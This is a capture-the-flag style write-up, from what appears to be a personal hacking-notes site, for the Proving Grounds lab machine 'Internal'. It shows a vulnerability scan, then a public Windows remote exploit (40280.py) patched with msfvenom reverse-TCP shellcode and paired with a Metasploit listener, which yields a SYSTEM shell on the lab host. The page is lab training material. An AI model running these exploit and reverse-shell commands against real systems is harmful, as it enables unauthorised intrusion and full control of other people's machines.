📔
Hack World
  • Welcome to Hack World
  • Writeup
    • Proving Grounds - Practice
      • AuthBy
      • Jacko
      • UT99
      • Sirol
      • Twiggy
      • Bratarina
      • Internal
      • Algernon
      • Metallus
      • Kevin
      • Helpdesk
      • Slort
      • Shenzi
      • Pelican
      • Walla
      • Zino
      • Nibbles
      • ZenPhoto
      • Wombo
    • CyberSecLabs
      • Lazy
      • Red
      • Shock
      • CMS
      • Debug
      • Leakage
      • Simple
      • Shares
      • Unroot
      • Outdated
      • Fuel
      • Pie
    • Vulnhub
      • Linux
        • BTRSys2.1
        • CyberSploit1
        • SunsetNoontide
    • HackTheBox
      • Cap
Powered by GitBook
On this page
  • nmap
  • Exploitation

Was this helpful?

  1. Writeup
  2. Proving Grounds - Practice

Internal

PreviousBratarinaNextAlgernon

Last updated 3 years ago

Was this helpful?

nmap

mkdir nmap
sudo rustscan -a 192.168.201.40 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan --scripts vuln

Looks like there's a CVE detected by nmap

Exploitation

Let's find the source code of the exploit of this CVE.

Mirror the exploit to your local machine

searchsploit -m windows/remote/40280.py

Create shellcode with msfvenom as per exploit instruction.

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.49.201 LPORT=4444  EXITFUNC=thread  -f python -v shell

Copy the shellcode and replace it on the source code

Open msfconsole and execute the following

use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lhost tun0
set exitfunc thread
run

Run the exploit

python 40280.py 192.168.201.40

And you should receive your nt authority\system shell.